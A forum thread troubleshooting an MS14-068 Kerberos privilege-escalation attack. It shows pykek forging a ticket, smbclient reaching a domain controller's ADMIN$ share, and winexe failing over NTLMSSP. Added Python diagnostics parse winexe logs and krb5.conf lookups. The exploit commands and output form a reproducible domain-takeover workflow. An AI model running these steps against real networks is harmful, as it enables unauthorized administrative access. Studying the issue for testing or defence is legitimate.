I am working in an environment that is vulnerable to ms14_068. I created the ticket and used smbclient without issue to access the ADMIN$ share on the domain controller. I attempted to use winexe with the kerberos flag, and it attempts to use NTLMSSP auth and states I have no access to the ADMIN$ share.
Please note I have changed the info such as server names, etc but I assure you everything else is legitimate.
uname -a
Linux Kali-LABS 3.14-kali1-amd64 #1 SMP Debian 3.14.5-1kali1 (2014-06-07) x86_64 GNU/Linux
Output:
root@Kali-LABS:~/pykek# python ms14-068.py -u user1@acme.com -s S-1-5-21-1122334455-1122334455-1122334455-1001 -d server1.acme.com
Password:
[+] Building AS-REQ for server1.acme.com... Done!
[+] Sending AS-REQ to server1.acme.com... Done!
[+] Receiving AS-REP from server1.acme.com... Done!
[+] Parsing AS-REP from server1.acme.com... Done!
[+] Building TGS-REQ for server1.acme.com... Done!
[+] Sending TGS-REQ to server1.acme.com... Done!
[+] Receiving TGS-REP from server1.acme.com... Done!
[+] Parsing TGS-REP from server1.acme.com... Done!
[+] Creating ccache file 'TGT_user1@acme.com.ccache'... Done!
root@Kali-LABS:~/pykek# mv TGT_user1@acme.com.ccache /tmp/krb5cc_0
root@Kali-LABS:~/pykek# smbclient -W ACME.COM //server1.acme.com/ADMIN$ -k
Unable to create directory /var/run/samba for file gencache.tdb. Error was No such file or directory
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: > dir
. D 0 Sat May 10 23:03:00 2014
.. D 0 Sat May 10 23:03:00 2014
ADWS D 0 Fri May 3 20:11:29 2013
AppPatch D 0 Sat May 10 23:11:08 2014
assembly DR 0 Thu Oct 9 09:53:53 2014
bfsvc.exe A 71168 Sat Nov 20 19:12:58 2010
root@Kali-LABS:~/pykek# winexe --kerberos=yes //server1.acme.com 'CMD /C echo %TEMP%' -d3
Enter password:
winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
IN: async_open(\ahexec, 2)
IN: async_open_recv
ERROR: smb_raw_open_recv - NT_STATUS_OBJECT_NAME_NOT_FOUND
ERROR: on_ctrl_pipe_error - NT_STATUS_OBJECT_NAME_NOT_FOUND
ERROR: Cannot open control pipe - NT_STATUS_OBJECT_NAME_NOT_FOUND, installing service
Installing service
Using binding ncacn_np:server1.acme.com
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
ERROR: Failed to open ADMIN$ share. NT_STATUS_ACCESS_DENIED.
ERROR: UploadService failed. NT_STATUS_ACCESS_DENIED.
krb5.conf
[realms]
ACME.COM = {
kdc = server1.acme.com:88
kdc = server2.acme.com:88
admin_server = server1.acme.com
default_domain = acme.com
}
[domain_realm]
.acme.com = ACME.COM
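The -d3 output above already tells which mechanism winexe used. Below is an added example (my own code, not part of the original post and not from winexe or Samba) that reads winexe debug lines, decodes the NTLMSSP negotiate flags against the MS-NLMP bit definitions, and collects the NT_STATUS codes. The sample log is a constructed copy of the relevant lines from the post; the keys of the returned summary are my own naming. The point it makes concrete: smbclient -k presented the pykek ccache over Kerberos, so the forged PAC was honoured, while the `Got NTLMSSP neg_flags=...` lines show winexe running an NTLM exchange, which authenticates with the typed password as the real, unprivileged user1, an account to which ADMIN$ is legitimately denied.

```python
"""Classify a winexe -dN log: did authentication go over NTLMSSP, and with
which negotiated flags?  Added example; not code from winexe or Samba."""
import re

# NTLMSSP NEGOTIATE flag bits, from MS-NLMP section 2.2.2.5.
NTLMSSP_FLAGS = {
    0x00000001: "NEGOTIATE_UNICODE",
    0x00000002: "NEGOTIATE_OEM",
    0x00000004: "REQUEST_TARGET",
    0x00000010: "NEGOTIATE_SIGN",
    0x00000020: "NEGOTIATE_SEAL",
    0x00000040: "NEGOTIATE_DATAGRAM",
    0x00000080: "NEGOTIATE_LM_KEY",
    0x00000200: "NEGOTIATE_NTLM",
    0x00000800: "ANONYMOUS",
    0x00001000: "OEM_DOMAIN_SUPPLIED",
    0x00002000: "OEM_WORKSTATION_SUPPLIED",
    0x00008000: "NEGOTIATE_ALWAYS_SIGN",
    0x00010000: "TARGET_TYPE_DOMAIN",
    0x00020000: "TARGET_TYPE_SERVER",
    0x00080000: "NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x00100000: "NEGOTIATE_IDENTIFY",
    0x00400000: "REQUEST_NON_NT_SESSION_KEY",
    0x00800000: "NEGOTIATE_TARGET_INFO",
    0x02000000: "NEGOTIATE_VERSION",
    0x20000000: "NEGOTIATE_128",
    0x40000000: "NEGOTIATE_KEY_EXCH",
    0x80000000: "NEGOTIATE_56",
}
KNOWN_MASK = sum(NTLMSSP_FLAGS)  # OR of all named bits (keys are disjoint)

FLAGS_RE = re.compile(r"Got NTLMSSP neg_flags=0x([0-9a-fA-F]{1,8})")
STATUS_RE = re.compile(r"(NT_STATUS_[A-Z0-9_]+)")


def decode_ntlmssp_flags(value):
    """Return the flag names set in value, lowest bit first; unnamed bits are
    reported as one UNKNOWN_0x... entry so nothing is silently dropped."""
    names = [name for bit, name in sorted(NTLMSSP_FLAGS.items()) if value & bit]
    unknown = value & ~KNOWN_MASK & 0xFFFFFFFF
    if unknown:
        names.append("UNKNOWN_0x%08x" % unknown)
    return names


def analyse_winexe_log(lines):
    """Summarise a winexe debug log.  'mechanism' is NTLMSSP when the log shows
    an NTLMSSP negotiation; a Kerberos-authenticated session shows none.
    (The summary keys are my own naming, not winexe output.)"""
    negotiated = [int(m.group(1), 16) for m in map(FLAGS_RE.search, lines) if m]
    statuses = sorted({m.group(1) for m in map(STATUS_RE.search, lines) if m})
    final_flags = decode_ntlmssp_flags(negotiated[-1]) if negotiated else []
    return {
        "mechanism": "NTLMSSP" if negotiated else "no NTLMSSP exchange seen",
        "ntlmssp_rounds": len(negotiated),
        "final_flags": final_flags,
        "nt_status": statuses,
    }


# Constructed sample: the relevant lines copied from the winexe -d3 output in the post.
SAMPLE_LOG = """\
Got challenge flags:
Got NTLMSSP neg_flags=0x62898215
NTLMSSP: Set final flags:
Got NTLMSSP neg_flags=0x60088215
ERROR: Cannot open control pipe - NT_STATUS_OBJECT_NAME_NOT_FOUND, installing service
Got NTLMSSP neg_flags=0x62898215
Got NTLMSSP neg_flags=0x60088215
ERROR: Failed to open ADMIN$ share. NT_STATUS_ACCESS_DENIED.
ERROR: UploadService failed. NT_STATUS_ACCESS_DENIED.
""".splitlines()

if __name__ == "__main__":
    summary = analyse_winexe_log(SAMPLE_LOG)
    print("mechanism:", summary["mechanism"])
    print("final flags:", ", ".join(summary["final_flags"]))
    print("NT_STATUS seen:", ", ".join(summary["nt_status"]))
```

Running it on the posted output reports NTLMSSP with NEGOTIATE_KEY_EXCH, NEGOTIATE_128 and NEGOTIATE_EXTENDED_SESSIONSECURITY in the final flag set, which is an ordinary NTLMv2 session. Whether the forged ticket is used at all depends on the client going through GSSAPI: smbclient -k did, and found the ccache at /tmp/krb5cc_0, the default location for uid 0; exporting KRB5CCNAME to the ccache path is the more portable way to hand it to any Kerberos-aware client.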
I'm having the same issue, same scenario. I compiled winexe from source 2014.12.13 (this morning).
I can use the username/password to run commands, but using just kerberos doesn't work.
Doing a -d5 reveals that even though the krb5.conf file specifies the correct KDCs, specifies using DNS, etc., and this works for everything else that does kerberos, when winexe attempts to locate kerberos principals it is only using the netbios name and is not converting it to the FQDN. No DNS queries are performed either, other than the system A record name lookup.
Here is an excerpt of the logs from winexe:
Failed to get kerberos credentials: kinit for user@ACME failed (Cannot contact any KDC for requested realm)
Cannot reach a KDC we require to contact cifs/dc.acme.local@ : kinit for user@ACME failed (Cannot contact any KDC for requested realm)
I have entries in krb5.conf under [domain_realms] for ACME = ACME.LOCAL, but it doesn't look like winexe is referencing the krb5.conf file at all.
What is even more interesting is that when I specify winexe -k yes, or winexe --kerberos=yes (with the other options), it doesn't try to authenticate with kerberos at all... at least you can't see it in the -d5 output.
sample command (run with -d5):
winexe -U <netbios domain name>/<username> //<fqdn computer name> '<command>' -d5
winexe -U acme/user //dc.acme.local 'ipconfig' -d5
winexe -U acme/user //wkstn.acme.local 'ipconfig' -d5
and the above with -k yes or --kerberos=yes.
When I do the above as a domain admin account, it works, but it does try kerberos by default, and because it can't find a KDC for admin@ACME it fails and falls back to ntlmssp, which is successful.
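Both posts show libkrb5 finding the KDC for smbclient while winexe ends up with principals like user@ACME and cifs/dc.acme.local@ (empty realm). The following is an added example, not code from either poster, from winexe or from MIT krb5, that parses a krb5.conf modelled on the fragment posted earlier in this thread (the [libdefaults] default_realm line is my assumption; the original post does not show one) and replays the lookups libkrb5 performs: the [domain_realm] search for a host name (exact host, then each parent domain with and without a leading dot, then default_realm), and the [realms] search for a KDC. DNS TXT and realm_try_domains heuristics are left out. The function names are mine.

```python
"""Replay libkrb5's [domain_realm] and [realms] lookups against a krb5.conf.
Added example; a simplified model of MIT krb5's search order, not its code."""
import re

# Constructed krb5.conf, based on the [realms]/[domain_realm] fragment posted
# in this thread.  default_realm is an assumption the original post does not show.
KRB5_CONF = """\
[libdefaults]
    default_realm = ACME.COM

[realms]
    ACME.COM = {
        kdc = server1.acme.com:88
        kdc = server2.acme.com:88
        admin_server = server1.acme.com
        default_domain = acme.com
    }

[domain_realm]
    .acme.com = ACME.COM
"""

SECTION_RE = re.compile(r"^\[([A-Za-z_]+)\]$")


def parse_krb5_conf(text):
    """Minimal krb5.conf parser: {section: {key: [values]}}; a 'NAME = {' block
    (as used under [realms]) becomes {section: {NAME: {key: [values]}}}."""
    sections = {}
    current = None   # dict for the current [section]
    block = None     # dict for the current 'NAME = {' sub-block, if any
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = sections.setdefault(m.group(1), {})
            block = None
            continue
        if current is None:
            continue
        if line.endswith("{"):
            name = line[:-1].split("=", 1)[0].strip()
            block = current.setdefault(name, {})
            continue
        if line == "}":
            block = None
            continue
        key, _, value = line.partition("=")
        target = block if block is not None else current
        target.setdefault(key.strip(), []).append(value.strip())
    return sections


def host_to_realm(conf, host):
    """Map a service host to a realm the way [domain_realm] is searched: exact
    host, then each parent domain (with, then without, a leading dot), longest
    first; then default_realm; None if nothing applies."""
    mapping = {k.lower(): v[0] for k, v in conf.get("domain_realm", {}).items()
               if isinstance(v, list)}
    host = host.lower().rstrip(".")
    if host in mapping:
        return mapping[host]
    labels = host.split(".")
    for i in range(1, len(labels)):
        parent = ".".join(labels[i:])
        for candidate in ("." + parent, parent):
            if candidate in mapping:
                return mapping[candidate]
    default = conf.get("libdefaults", {}).get("default_realm")
    return default[0] if default else None


def kdcs_for_realm(conf, realm):
    """KDC entries listed for realm under [realms]; empty if the realm is absent."""
    block = conf.get("realms", {}).get(realm)
    return list(block.get("kdc", [])) if isinstance(block, dict) else []


def diagnose_principal(conf, principal):
    """Explain a 'cannot contact any KDC' for a principal: split off the realm
    and check whether [realms] names a KDC for it."""
    _, sep, realm = principal.partition("@")
    if not sep or not realm:
        return "no realm in principal %r; the [domain_realm] lookup never ran" % principal
    kdcs = kdcs_for_realm(conf, realm)
    if kdcs:
        return "realm %s has KDCs: %s" % (realm, ", ".join(kdcs))
    return "realm %r is not in [realms]; no KDC can be located for it" % realm


CONF = parse_krb5_conf(KRB5_CONF)

if __name__ == "__main__":
    for host in ("server1.acme.com", "wkstn.acme.com", "dc"):
        print("%-20s -> realm %s" % (host, host_to_realm(CONF, host)))
    for principal in ("user1@ACME.COM", "user@ACME", "cifs/dc.acme.local@"):
        print("%-22s : %s" % (principal, diagnose_principal(CONF, principal)))
```

Two things the replay makes concrete. [domain_realm] maps host names to realms, so an `ACME = ACME.LOCAL` entry would only affect a host literally named ACME; the realm in `user@ACME` comes from how the client builds the user principal (here the NetBIOS domain from -U), which is why supplying the principal in realm form (user@ACME.LOCAL) is the first thing to try when a client composes the wrong realm. And a realm that appears in neither [realms] nor DNS has no KDC to contact, which is what both error lines in the excerpt report; that a correct lookup on this config yields a realm for every host in the domain supports the observation that winexe is not consulting krb5.conf at all.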